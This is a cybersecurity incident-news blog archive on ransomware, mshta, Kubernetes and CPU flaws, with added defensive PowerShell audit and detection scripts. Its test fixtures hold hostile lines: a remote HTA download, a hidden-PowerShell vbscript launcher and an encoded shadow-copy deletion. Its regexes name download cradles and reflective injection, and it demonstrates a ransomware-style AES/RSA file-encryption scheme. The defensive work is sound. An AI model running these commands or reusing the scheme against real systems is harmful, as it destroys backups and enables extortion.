Category Archives: cyber security incident news highlight

Hong Kong Cyberport is plagued by ransomware! (15th Sep 2023)

Preface: On 13th Sep 2023 there was another development in the Cyberport hacking incident, according to wepro180[.]com: the 400GB of stolen data was published on the dark web on Tuesday (12/9), including employee salaries, applicant resumes, credit card information and other sensitive documents. Cyberport said it has directly contacted those who may be affected.

Think about it after you know it

About the computer functional footprint: business users store some data in SharePoint lists, and operations management typically needs reporting and analytics, so a popular solution gets selected. ETL processes extract data from different sources, transform it, and load it into a data warehouse (MSSQL).

By default the CLR is not enabled in SQL Server. Once CLR integration is switched on, you can write stored procedures, triggers, user-defined functions, user-defined aggregates and user-defined types in Microsoft .NET code, e.g. Visual Basic .NET or C#, and the engine loads and runs that code inside its own process.

For example, a table-valued function (TVF) written as a CLR function.

The rise of the ransomware power

In April 2023, Trigona was observed targeting MSSQL servers that had been compromised by brute-forcing credentials, according to security researchers. The group had already been operating actively on the Internet since around late October 2022.

Trigona's operators use a CLR shell in attacks launched against MS-SQL servers. Presumably they target SQL servers precisely because of this design weakness: a feature that is off by default, but which an attacker holding sysadmin rights can switch on and then use to run arbitrary .NET code in the database engine's process. All versions of Trigona currently use TDCP_rijndael (the Delphi AES implementation) to encrypt the target files.
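The two paragraphs above describe how CLR integration is disabled by default and how the ransomware operators switch it on to load a CLR shell. As an added example that is not code from the original post or from Trigona, the following PowerShell script audits a SQL Server instance for exactly those switches and lists the user assemblies an attacker would leave behind. It assumes the SqlServer module (Invoke-Sqlcmd) is installed and the caller has sysadmin or VIEW SERVER STATE rights; $Instance and the connection settings are placeholders.

```powershell
# Added example, not code from the original post or from Trigona: audit a SQL Server
# instance for the switches a CLR shell needs and list the user assemblies it would
# leave behind. Assumes the SqlServer PowerShell module (Invoke-Sqlcmd) and a login
# with sysadmin / VIEW SERVER STATE rights; $Instance is a placeholder.
param([string]$Instance = 'localhost')

# Server-level switches. 'clr enabled' is 0 by default. 'clr strict security'
# (SQL Server 2017+) makes the engine treat every assembly as UNSAFE unless it is
# signed and trusted, so an attacker turning it OFF is as interesting as one turning
# 'clr enabled' ON. xp_cmdshell and Ole Automation are the other classic footholds.
$configQuery = @"
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('clr enabled', 'clr strict security', 'xp_cmdshell', 'Ole Automation Procedures');
"@

# User-defined assemblies in one database. A CLR shell is typically created from a
# hex literal (CREATE ASSEMBLY ... FROM 0x4D5A...) with PERMISSION_SET = UNSAFE.
$assemblyQuery = @"
SELECT DB_NAME() AS db, a.name, a.permission_set_desc, a.create_date,
       USER_NAME(a.principal_id) AS owner
FROM sys.assemblies AS a
WHERE a.is_user_defined = 1;
"@

$findings = @()
foreach ($row in (Invoke-Sqlcmd -ServerInstance $Instance -Query $configQuery)) {
    if ($row.name -eq 'clr strict security') {
        if ($row.value_in_use -eq 0) { $findings += "[server] 'clr strict security' is OFF" }
    }
    elseif ($row.value_in_use -eq 1) { $findings += "[server] '$($row.name)' is ON" }
}

# database_id 1-4 are master, tempdb, model and msdb; look at user databases only.
$userDbs = Invoke-Sqlcmd -ServerInstance $Instance -Query `
    "SELECT name FROM sys.databases WHERE database_id > 4 AND state_desc = 'ONLINE';"
foreach ($db in $userDbs) {
    foreach ($a in (Invoke-Sqlcmd -ServerInstance $Instance -Database $db.name -Query $assemblyQuery)) {
        $findings += "[db:$($a.db)] assembly '$($a.name)' permission_set=$($a.permission_set_desc)" +
                     " owner=$($a.owner) created=$($a.create_date)"
    }
}

if ($findings.Count -eq 0) { 'No CLR or command-execution findings.' } else { $findings }
```

Any assembly with permission_set_desc of UNSAFE_ACCESS or EXTERNAL_ACCESS that nobody can account for, created around the time of a burst of failed logins for sa, is the signature of the attack described above. If CLR is not needed, turn it back off with `EXEC sp_configure 'clr enabled', 0; RECONFIGURE;` and drop the assembly; either way, the brute-force entry point is closed by not exposing port 1433 to the Internet and by locking out or renaming the sa login.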

My comment: Any software or hardware design exists to help people work more efficiently. In theory we all know about protection, defense and mitigation; in practice, in today's demanding business world with multi-solution environments, talk about cybersecurity has to be accompanied by practical support. The market is highly competitive, and every new project adds to the network-security burden, so sometimes it ends up as a trade-off made by the business owner or the management team.

Is this the last round of remediation for CVE-2022-26373? Intel's Enhanced Indirect Branch Restricted Speculation (eIBRS) – 6th Feb 2023

Preface: Technical details of CVE-2022-26373 were released to the public on 9th Aug 2022, and as of the end of January 2023 updates for this vulnerability were still appearing. For example, Red Hat fixed it in Red Hat Enterprise Linux 7 on 3rd Nov 2022 and has since been rolling the remediation across its product line; the 24th Jan 2023 fix for Red Hat Virtualization 4 for Red Hat Enterprise Linux 8 may be the final round.
This looks like a CPU-vendor-specific bug, and some vendors have accordingly stated that their products are not affected. Is that an absolute answer? It all depends on which CPU brand the product uses.

Background: From a technical point of view, Indirect Branch Restricted Speculation (IBRS) is an indirect branch control mechanism that restricts speculation of indirect branches. Technical details:
CPUID.(EAX=7H,ECX=0): if EDX[26] is 1, the processor supports IBRS and IBPB, and
the OS can write the IA32_SPEC_CTRL (MSR 48H) and IA32_PRED_CMD (MSR 49H) registers to control the behaviour of the indirect branch predictor.
In practice, basic IBRS was not adopted for kernel entry because of its cost, but it does come into play when VMs are switched. This class of weakness was first found in early 2018.

Vulnerability details: A flaw was found in hardware. In certain processors with Intel's Enhanced Indirect Branch Restricted Speculation (eIBRS) capability, shortly after a VM exit or an IBPB command event, the linear address following the most recent near CALL instruction executed before the VM exit may be used as the Return Stack Buffer (RSB) prediction.
This non-transparent sharing of return predictor targets between contexts in some Intel processors may allow an authorized user to enable information disclosure via local access.

Official announcement – For details, see URL – https://access.redhat.com/security/cve/cve-2022-26373

What is the value of the Trusted Execution Environment (TEE) ? (20th JAN 2023)

Preface: It was reported that a newly found malware lets cybercriminals remotely manipulate your Android device.

Background: TEE stands for trusted execution environment, an isolated area on the CPU of mobile devices (smartphones, tablets, smart TVs). Its role is to provide a more secure space for data and code execution and to guarantee their confidentiality and integrity.

Other TEE operating systems are traditionally supplied as binary blobs by third-party vendors or developed in-house. Developing an internal TEE system or licensing a TEE from a third party can be costly for System-on-Chip (SoC) vendors and OEMs.

Trusty is a secure Operating System (OS) that provides a Trusted Execution Environment (TEE) for Android. A Trusty application is defined as a collection of binary files (executables and resource files), a binary manifest, and a cryptographic signature. At runtime, Trusty applications run as isolated processes in unprivileged mode under the Trusty kernel.

Technical details: According to BleepingComputer, a new Android malware named 'Hook' is being sold by cybercriminals, who boast that it can remotely take over mobile devices in real time using VNC (virtual network computing).

For details, please refer to URL – https://www.bleepingcomputer.com/news/security/new-hook-android-malware-lets-hackers-remotely-control-your-phone/

Speculation: If this reported malware achieves its goals, do you think it relies on a vulnerability such as CVE-2023-21420?

Solution: To avoid Android malware of this kind, install apps only from the Google Play Store.

Here’s wishing you a Happy Chinese New Year 2023.

Headline news: FAA system outage disrupts thousands of flights across U.S. (12th Jan 2023)

Preface: Thousands of flights across the U.S. were delayed on Wednesday after a Federal Aviation Administration pilot-alert system failed overnight, prompting a nationwide halt to departures, according to CNBC.

Headline news – https://www.cnbc.com/2023/01/11/faa-orders-airlines-to-pause-departures-until-9-am-et-after-system-outage.html

Background: The Department of Homeland Security published the following opinion four years ago.

The GPS system is now considered a "cross-sector dependency" for the Department of Homeland Security's (DHS) 16 designated critical infrastructure sectors. GNSS is vulnerable to jamming and natural interference; when GNSS is denied, positioning, navigation and timing (PNT) information can be seriously affected in ways that increase risks to the safety of navigation.

My observation: The incident was probably not caused by a cyber attack. But industry experts know that the overall system architecture depends on OS-vendor-specific drivers.

For example, a driver for a given standard can be implemented with user-mode extensions. That model is often not recommended because it tends to use more memory; on the other hand the standard is available on all platforms, and using a driver written in user mode is strongly recommended.

So the functionality is not only OS-specific; it also involves third-party vendors doing the software development. The aviation industry is a special zone, but it now runs on current computer technology, and in today's computing world patching vulnerabilities is routine. So who can say that this is a trusted zone that will be free of vulnerabilities forever?

The evasion techniques of Ring 3 continue to improve. Since this is the entry point, Layer 7 with deep packet inspection is the basis of the defensive technique. (6th Dec 2021)

Preface: Despite the Excel icon, an XLL file is a Dynamic Link Library, i.e. a binary executable.

Background: The number of data breaches as of September 30, 2021 had already exceeded the full-year total for 2020 by 17% (1,291 breaches in 2021 versus 1,108 in 2020).

The fundamental objective of MS Office products is to increase office-automation efficiency. Before such products existed, typewriters, carbon copies and copy machines were fully utilised. When viruses appeared in the early 90s, cyber attacks evolved from disruption to suspending office operations. Fundamentally, the role of automation software is to run the operation, and nothing in our world is perfect: from one viewpoint, cyber criminals misuse product design weaknesses; from another, design weaknesses can be grouped together with mis-configuration. When cyber criminals abuse either, the software becomes a weapon. Some domain experts separate IT and OT, but MS Office has also become one of the operational components in their back-end operations. What if MS Office suddenly becomes a cyber-attack tool? What could it do?

If the differences between IT and OT are safety and a longer product life cycle, then apart from safety, software product life cycles are shorter than they were ten years ago, while in industrial automation the hardware is driven by software drivers. So it is clear that if the OT product life cycle is longer than in traditional IT, end-of-life and end-of-support need particular attention in this area; otherwise, when a similar incident occurs, the benefit goes to the attacker.

Security Focus: Mshta.exe is a signed Microsoft application that runs Microsoft HTML Application (HTA) files. These are HTML files that execute JavaScript or VBScript outside of the browser, with the full permissions of the executing user.

Furthermore, HTA files run automatically when a user double-clicks them, which makes them well suited to phishing, malvertising or watering-hole attacks where the user clicks the file and infects themselves. Lack of security awareness is the underlying weakness. If you are interested in the HTA attack scenario, please refer to the attached diagram.

But who wants to know a simple way to set up compensating controls in your office or industrial area?
If the system infrastructure is connected to the Internet, a clean DNS service, a SIEM, defenses including a managed security service, and local defense (antivirus) form the defense baseline.
Be my guest; see whether you have time to think this topic over.
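The mshta.exe behaviour described above (HTA files run with the user's full permissions, usually launched from a phishing lure) is what a detection rule should key on. As an added example, not code from the original post, the following PowerShell function flags suspicious mshta.exe launches from process-creation records; the sample records are constructed for illustration, and in production you would feed it Security event 4688 or Sysmon Event ID 1 data instead.

```powershell
# Added example, not from the original post: flag suspicious mshta.exe launches from
# process-creation records. $sampleEvents is constructed; replace it with fields
# parsed from Security 4688 / Sysmon Event ID 1 events.
$sampleEvents = @(
    [pscustomobject]@{ Parent='C:\Windows\explorer.exe';
                       Image='C:\Windows\System32\mshta.exe';
                       CommandLine='mshta.exe C:\Tools\report.hta' },
    [pscustomobject]@{ Parent='C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE';
                       Image='C:\Windows\System32\mshta.exe';
                       CommandLine='mshta.exe http://203.0.113.10/invoice.hta' },
    [pscustomobject]@{ Parent='C:\Windows\System32\cmd.exe';
                       Image='C:\Windows\System32\mshta.exe';
                       CommandLine='mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -nop -w hidden""")' },
    [pscustomobject]@{ Parent='C:\Windows\explorer.exe';
                       Image='C:\Windows\System32\notepad.exe';
                       CommandLine='notepad.exe notes.txt' }
)

function Test-SuspiciousMshta {
    param([Parameter(Mandatory)][pscustomobject]$Event)
    if ($Event.Image -notmatch '(?i)\\mshta\.exe$') { return $null }
    $reasons = @()
    # HTA fetched over HTTP/FTP or from a UNC share: the file never has to land on disk.
    if ($Event.CommandLine -match '(?i)(https?|ftp)://|\\\\\w') { $reasons += 'remote HTA' }
    # Inline script protocol handlers run code without any .hta file at all.
    if ($Event.CommandLine -match '(?i)\b(javascript|vbscript|about):') { $reasons += 'inline script protocol' }
    # Office or a script host spawning mshta is the classic macro / phishing chain.
    if ($Event.Parent -match '(?i)\\(winword|excel|powerpnt|outlook|wscript|cscript|cmd|powershell)\.exe$') {
        $reasons += "parent $(Split-Path $Event.Parent -Leaf)"
    }
    if ($reasons.Count -eq 0) { return $null }
    [pscustomobject]@{ CommandLine = $Event.CommandLine; Reasons = ($reasons -join ', ') }
}

$sampleEvents | ForEach-Object { Test-SuspiciousMshta $_ } | Where-Object { $_ } | Format-Table -AutoSize
```

Run against the sample, the first record (a local .hta opened from Explorer) is silent, the second is flagged for a remote HTA with an Office parent, and the third for an inline vbscript: handler launched from cmd.exe. As a compensating control alongside the baseline above, mshta.exe can simply be denied for ordinary users with an AppLocker or WDAC rule, or the Microsoft Defender attack surface reduction rule that blocks Office applications from creating child processes can be enabled with `Set-MpPreference`.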

Kubernetes Hardening Guidance by NSA & CISA (3rd Aug 2021)

Preface: Docker helps to "create" containers, and Kubernetes lets you "manage" them at runtime. What is Kubernetes security? It spans the Cloud, the Cluster, the Container and the Code (the "4 Cs").

Background: NSA and CISA observe that Kubernetes is commonly targeted for three reasons: data theft, theft of computational power, or denial of service. Attacks on container and Kubernetes environments in recent years include the following:

Capital One – Occurring in 2019, this breach saw 30GB of credit application data affecting about 106 million people exfiltrated. A mis-configured web application firewall allowed an attacker to query the internal instance metadata service and obtain Amazon Web Services credentials.
Docker Hub – Attackers managed to plant malicious images in Docker Hub; users who unknowingly deployed them ran cryptocurrency miners in the form of Docker containers that diverted compute resources toward mining cryptocurrency for the attacker.
Microsoft Azure – Microsoft is another organization that has seen plenty of cryptojacking woes of its own, disclosing a large-scale cryptomining attack against Kubernetes clusters in Azure in April 2020.
Tesla – Automaker Tesla was one of the earlier victims of cryptojacking when a Kubernetes cluster was compromised because an administrative console was not password protected (mis-configuration).
Jenkins – Hackers exploited a vulnerability in Jenkins to cryptomine to the tune of about $3.5 million, or 10,800 Monero, in 18 months. In Docker's environment, six malicious images were found to have been collectively pulled over 2 million times: that is potentially 2 million users mining Monero for the attacker.

To help prevent similar incidents, the National Security Agency (NSA) and the Cybersecurity and Infrastructure Security Agency (CISA) released a Cybersecurity Technical Report, "Kubernetes Hardening Guidance". Its primary actions include scanning containers and Pods for vulnerabilities or mis-configurations, running containers and Pods with the least privileges possible, and using network separation, firewalls, strong authentication and log auditing. Please refer to the link for details – https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2716980/nsa-cisa-release-kubernetes-hardening-guidance/
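Most of the incidents listed above come down to a Pod or console running with more privilege or exposure than it needed, which is the "least privileges possible" point in the NSA/CISA guidance. As an added example, not taken from the report, the following PowerShell function audits Pod specs for the settings that guidance calls out. The Pod list JSON is constructed inline; in practice you would pipe in the output of `kubectl get pods -A -o json`.

```powershell
# Added example, not from the NSA/CISA report: audit Pod specs for least-privilege
# settings. $sampleJson is constructed; in practice use:
#   kubectl get pods -A -o json | Get-PodFindings
$sampleJson = @'
{ "items": [
  { "metadata": { "namespace": "default", "name": "miner-like" },
    "spec": { "hostNetwork": true, "hostPID": true,
      "containers": [ { "name": "app", "image": "docker.io/someone/app:latest",
        "securityContext": { "privileged": true } } ] } },
  { "metadata": { "namespace": "prod", "name": "web" },
    "spec": { "automountServiceAccountToken": false,
      "containers": [ { "name": "web", "image": "registry.internal/web:1.4.2",
        "securityContext": { "runAsNonRoot": true, "allowPrivilegeEscalation": false,
          "readOnlyRootFilesystem": true, "capabilities": { "drop": [ "ALL" ] } } } ] } }
] }
'@

function Get-PodFindings {
    param([Parameter(Mandatory, ValueFromPipeline)][string]$PodListJson)
    process {
        $pods = (ConvertFrom-Json $PodListJson).items
        foreach ($pod in $pods) {
            $id     = "$($pod.metadata.namespace)/$($pod.metadata.name)"
            $spec   = $pod.spec
            $issues = @()
            # Host namespaces give a container a view of the node itself.
            foreach ($flag in 'hostNetwork', 'hostPID', 'hostIPC') {
                if ($spec.$flag -eq $true) { $issues += "$flag=true" }
            }
            # A mounted service-account token is the first thing a cryptojacker steals.
            if ($spec.automountServiceAccountToken -ne $false) { $issues += 'service account token auto-mounted' }
            foreach ($c in $spec.containers) {
                $sc = $c.securityContext   # may be absent; missing settings count as findings
                if ($sc.privileged -eq $true)                { $issues += "$($c.name): privileged" }
                if ($sc.runAsNonRoot -ne $true)              { $issues += "$($c.name): runAsNonRoot not set" }
                if ($sc.allowPrivilegeEscalation -ne $false) { $issues += "$($c.name): allowPrivilegeEscalation not false" }
                if ($sc.readOnlyRootFilesystem -ne $true)    { $issues += "$($c.name): writable root filesystem" }
                if (-not ($sc.capabilities.drop -contains 'ALL')) { $issues += "$($c.name): capabilities not dropped" }
                # Crude tag check: ':latest' or no tag at all means the image is not pinned.
                if ($c.image -match ':latest$' -or $c.image -notmatch ':') { $issues += "$($c.name): unpinned image tag" }
            }
            if ($issues.Count) { [pscustomobject]@{ Pod = $id; Issues = ($issues -join '; ') } }
        }
    }
}

Get-PodFindings $sampleJson | Format-List
```

With the sample input, the "miner-like" Pod produces a long list (host namespaces, privileged container, no runAsNonRoot, auto-mounted token, unpinned image) while the "prod/web" Pod produces none. The same checks are what a Pod Security admission policy at the "restricted" level enforces cluster-wide; the script is useful for finding what already runs before you turn such a policy on.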

DarkSide ransomware is ready to move. Operational Technology (OT) should stay alert (7-7-2021)

Preface: An IDC report predicted that by 2024, 60% of industrial organizations will integrate data from edge OT systems with cloud-based reporting and analytics, moving from single-asset views to site-wide operational awareness.

Background: PowerShell provides an adversary with a convenient interface for enumerating and manipulating a host system after the adversary has gained initial code execution.

Security Focus: According to security-company observations, PowerShell can be used to run Base64-encoded commands, and OT tooling is increasingly programmed and developed on PowerShell.
Cybercriminals responsible for ransomware often try to delete shadow copies so that their victims cannot restore file access from them. A related technique is Invoke-ReflectivePEInjection, which injects a DLL directly into the PowerShell process.
Because these steps require administrator privileges, the attackers rely on zero-days and unpatched victim workstations for privilege escalation.

Remark: What is more telling is the inclusion of function names that correspond to a PowerShell payload called "Invoke-ReflectivePEInjection", which lets an attacker inject a dynamic link library (DLL) directly into PowerShell.
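The Base64-encoded PowerShell commands mentioned above are worth decoding in the SIEM rather than matching on the raw command line, because the encoding hides the shadow-copy deletion and the Invoke-ReflectivePEInjection reference. As an added example, not code from CISA's alert or from DarkSide, the following PowerShell decodes an -EncodedCommand payload and flags those indicators; the sample command line is constructed inside the script.

```powershell
# Added example, not code from CISA AA21-131a or from DarkSide: decode the
# '-EncodedCommand' payload from a process command line and flag the tradecraft the
# alert describes. The sample command line is constructed; in practice feed it
# Security 4688 or Sysmon Event ID 1 command lines.

function Get-EncodedPayload {
    param([Parameter(Mandatory)][string]$CommandLine)
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...)
    # and the argument is Base64 over UTF-16LE text, not UTF-8.
    if ($CommandLine -match '(?i)\s-e[a-z]*\s+([A-Za-z0-9+/]{16,}={0,2})') {
        $bytes = [Convert]::FromBase64String($Matches[1])
        return [Text.Encoding]::Unicode.GetString($bytes)
    }
    return $null
}

$indicators = [ordered]@{
    'shadow copy deletion (WMI)'      = 'Win32_Shadowcopy'
    'shadow copy deletion (vssadmin)' = 'vssadmin(\.exe)?\s+delete\s+shadows'
    'reflective DLL injection'        = 'Invoke-ReflectivePEInjection'
    'download cradle'                 = 'DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b'
}

function Test-EncodedCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    $payload = Get-EncodedPayload $CommandLine
    if ($null -eq $payload) { return $null }
    $hits = foreach ($name in $indicators.Keys) {
        if ($payload -match ('(?i)' + $indicators[$name])) { $name }
    }
    $summary = if ($hits) { $hits -join ', ' } else { 'none' }
    [pscustomobject]@{ CommandLine = $CommandLine; Decoded = $payload; Indicators = $summary }
}

# Constructed sample: the shadow-copy deletion one-liner, encoded the way the
# attackers' tooling would pass it to powershell.exe.
$script  = 'Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($script))
$sample  = "powershell.exe -NoP -W Hidden -Exec Bypass -enc $encoded"

Test-EncodedCommand $sample | Format-List
```

The sample decodes to the WMI shadow-copy deletion and is reported under "shadow copy deletion (WMI)". Note the UTF-16LE step: decoding the Base64 as UTF-8 yields text interleaved with NUL bytes, which is why naive string matching on encoded command lines misses these payloads.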

Should you be interested in the above details: CISA has published a Malware Analysis Report and updated its alert on DarkSide ransomware. For more details, please refer to the link – https://us-cert.cisa.gov/ncas/alerts/aa21-131a

Headline News – unauthorized access to Japan government systems via Fujitsu ProjectWEB – 28-05-2021

Headline News – The incident affected the Ministry of Land, Infrastructure, Transport and Tourism, the Ministry of Foreign Affairs, the Cabinet Office and Narita Airport. The stolen data included files stored by government employees on the cloud-based collaboration and file-sharing platform ProjectWEB, which Fujitsu launched in the mid-2000s and which is very popular among Japanese civil servants.
According to Japanese media reports, the hackers stole documents containing more than 76,000 email addresses of Ministry of Land, Infrastructure, Transport and Tourism employees and others, but the government has not confirmed this.

Background: ProjectWEB is a cloud-based enterprise collaboration and file-sharing platform that Fujitsu has operated since the mid-2000s, and which a number of agencies within the Japanese government currently use.

One possible path to the data leak in this incident:
Daily operations on many small projects go through a web-based management system, and daily communication between project managers and project members uses Excel for status and quality management. If those Excel spreadsheets hit a design weakness such as CVE-2017-0006, CVE-2017-0019, CVE-2017-0020, CVE-2017-0030, CVE-2017-0031 or CVE-2017-0053, which allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted document, a data breach could follow.

Headline News – https://www3.nhk.or.jp/nhkworld/en/news/20210526_28/

Follow-up: Insurance company infected by ransomware – 25th May 2021

News feed: AXA Group announced on Sunday (16-05-2021) that it had become the victim of a ransomware attack. AXA Hong Kong said there was no evidence that data processed by Inter Partners Asia in markets other than Thailand had been affected by the targeted attack. No official announcement has been made since to update this incident.

Technology exploration: Avaddon ransomware encrypts files offline using AES-256 + RSA-2048. Even with a 128-bit AES key, cracking AES by checking each of the 2^128 possible key values (a "brute force" attack) is so computationally intensive that even the fastest supercomputer would need, on average, more than 100 trillion years. The Microsoft .NET cryptography library can encrypt and decrypt files on its own,
and Windows 10 ships with the .NET Framework 4 installed and enabled by default, so cybercriminals can simply reuse this built-in service. For more details, please refer to the attached document.
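To make the AES-256 + RSA-2048 point concrete, the following PowerShell is an added example (not Avaddon's code) of that hybrid construction built only on the .NET cryptography classes the post says Windows 10 already ships with. It assumes Windows PowerShell 5.1 (.NET Framework 4.6+) or PowerShell 7 on Windows, since RSACng is used so that OAEP-SHA256 padding works on both; the "file" contents are a constructed sample.

```powershell
# Added example, not Avaddon's code: the hybrid AES-256 + RSA-2048 scheme the post
# describes, using only .NET classes that ship with Windows (RSACng is Windows-only).
# It shows why recovery without the RSA private key is infeasible: the raw AES key
# never leaves the machine, only its RSA-wrapped form.

# Operator side, done once and offline. Only the public half (Modulus + Exponent)
# is embedded in the ransomware; the private half never touches the victim.
$operatorRsa  = [Security.Cryptography.RSACng]::new(2048)
$publicParams = $operatorRsa.ExportParameters($false)

function Protect-FileBytes {
    param([byte[]]$Data, [Security.Cryptography.RSAParameters]$PublicKey)
    # Fresh 256-bit AES key and IV per file.
    $aes = [Security.Cryptography.Aes]::Create()
    $aes.KeySize = 256
    $aes.Mode    = [Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [Security.Cryptography.PaddingMode]::PKCS7
    $aes.GenerateKey(); $aes.GenerateIV()
    $cipherText = $aes.CreateEncryptor().TransformFinalBlock($Data, 0, $Data.Length)

    # Wrap the AES key with the public key. Without the private key, the only way
    # back to the file is trying all 2^256 AES keys.
    $rsa = [Security.Cryptography.RSACng]::new()
    $rsa.ImportParameters($PublicKey)
    $wrappedKey = $rsa.Encrypt($aes.Key, [Security.Cryptography.RSAEncryptionPadding]::OaepSHA256)

    # Per-file blob: wrapped key + IV + ciphertext. The raw AES key is not stored.
    $blob = [pscustomobject]@{ WrappedKey = $wrappedKey; IV = $aes.IV; CipherText = $cipherText }
    $aes.Dispose(); $rsa.Dispose()     # Dispose scrubs the key material held by the objects
    return $blob
}

function Unprotect-FileBytes {
    param([pscustomobject]$Blob, [Security.Cryptography.RSA]$PrivateKey)
    $key = $PrivateKey.Decrypt($Blob.WrappedKey, [Security.Cryptography.RSAEncryptionPadding]::OaepSHA256)
    $aes = [Security.Cryptography.Aes]::Create()
    $aes.Key     = $key
    $aes.IV      = $Blob.IV
    $aes.Mode    = [Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [Security.Cryptography.PaddingMode]::PKCS7
    $plain = $aes.CreateDecryptor().TransformFinalBlock($Blob.CipherText, 0, $Blob.CipherText.Length)
    $aes.Dispose()
    return ,$plain     # leading comma keeps the byte[] from being unrolled
}

# Constructed sample "file".
$original = [Text.Encoding]::UTF8.GetBytes('constructed sample: policy 4711, claimant data')
$blob = Protect-FileBytes -Data $original -PublicKey $publicParams
"Wrapped key: $($blob.WrappedKey.Length) bytes, ciphertext: $($blob.CipherText.Length) bytes"

# Only the operator, who holds the private key, can reverse it.
$recovered = Unprotect-FileBytes -Blob $blob -PrivateKey $operatorRsa
[Text.Encoding]::UTF8.GetString($recovered)
```

The wrapped key is 256 bytes (the RSA-2048 modulus size) regardless of the file, and decryption only succeeds because $operatorRsa still holds the private half. That is why the defensive options are all upstream of the cryptography: offline backups that the ransomware cannot reach, and catching the process before it starts walking the file system.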

What is the consequence if AXA underestimates this matter? Or is it just a bluff?

In a similar type of attack (files encrypted with RSA-2048 and AES-128 keys), cyber-criminals gain access through remote-control systems; after the machine is infected with the ransomware, data exfiltration follows. In fact, the hacker group claimed to have stolen 3 terabytes of data, including a long list of information: ID cards, passport copies, customer claims, reserved agreements, denied reimbursements, payments to customers, contracts and reports, customer IDs and scanned bank account papers, hospital and doctor reserved material (private investigations for fraud), and customer medical reports including HIV, hepatitis, STD and other illness reports.

Latest news: https://www.thestandard.com.hk/section-news/section/2/230327/Axa-HK-unaffected-by-cyberattack

Cyber attack shuts down U.S. fuel pipeline ‘jugular,’ said Headline News – 9th May 2021

Preface: The hacker group claimed that its ransomware attacks are aimed only at the "right targets": it claims to attack only large, profitable companies, in order to "make the world a better place."

Background: Cyber attacks in the oil and gas industry can threaten an organisation's information technology (IT), its operational technology (OT) and any internet of things (IoT) systems in place.
Last year, security departments were already expressing such concerns.

Security Focus: The hacking team is very active on hacking forums and keeps its customers updated with news about the ransomware. The attacker's initial foothold in the network is speculated not to be limited to email phishing; perhaps they exploit an SSL VPN design weakness or a Microsoft zero-day. In the oil and gas industry, OPC UA technology is commonly deployed, and it is hard to avoid Microsoft products even when the OPC UA server runs on a Linux machine. DarkSide 2.0 claims the fastest encryption speed on the market and has both Windows and Linux versions. So that is how this story started.

Headline News – https://www.reuters.com/technology/colonial-pipeline-halts-all-pipeline-operations-after-cybersecurity-attack-2021-05-08/